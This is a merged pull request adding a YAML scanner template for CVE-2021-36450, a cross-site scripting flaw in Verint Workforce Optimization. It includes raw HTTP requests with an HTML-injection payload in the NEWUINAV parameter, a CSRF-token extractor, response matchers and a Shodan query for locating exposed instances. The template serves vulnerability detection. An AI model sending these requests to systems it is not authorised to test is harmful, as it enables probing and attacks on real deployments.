Merge pull request #4824 from atomiczsec/master

Add CVE-2021-36450.yaml

cves/2021/CVE-2021-36450.yaml

@@ -0,0 +1,62 @@
+id: CVE-2021-36450
+
+info:
+  name: Verint 15.2 - Cross Site Scripting
+  author: atomiczsec
+  severity: medium
+  description: Verint Workforce Optimization (WFO) 15.2.8.10048 allows XSS via the control/my_notifications NEWUINAV parameter.
+  reference:
+    - https://medium.com/@1nf0sk/cve-2021-36450-cross-site-scripting-xss-6f5d8d7db740
+    - https://sushantvkamble.blogspot.com/2021/11/cross-site-scripting-xss.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-36450
+  classification:
+    cvss-metrics: AV:N/AC:M/Au:N/C:N/I:P/A:N
+    cvss-score: 4.3
+    cve-id: CVE-2021-36450
+    cwe-id: CWE-79
+  metadata:
+    verified: true
+    shodan-query: title:"Verint Sign-in"
+  tags: cve,cve2021,xss,verint
+
+requests:
+  - raw:
+      - |
+        GET /wfo/control/signin?rd=%2Fwfo%2Fcontrol%2Fmy_notifications%3FNEWUINAV%3D%22%3E%3Ch1%3ETest%3C%2Fh1%3E26 HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        POST /wfo/control/signin?rd=%2Fwfo%2Fcontrol%2Fmy_notifications%3FNEWUINAV%3D%22%3E%3Ch1%3ETest%3Ch1%3E%26 HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        browserCheckEnabled=true&username=admin&language=en_US&defaultHttpPort=80&screenHeight=1080&screenWidth=1920&pageModelType=0&pageDirty=false&pageAction=Login&csrfp_login={{csrfp_login}}
+
+    redirects: true
+    max-redirects: 2
+    cookie-reuse: true
+
+    extractors:
+      - type: regex
+        part: header
+        internal: true
+        name: csrfp_login
+        group: 1
+        regex:
+          - 'csrfp_login=([a-zA-Z0-9]+);'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"><h1>Test</h1>26" class="loginUserNameText'
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200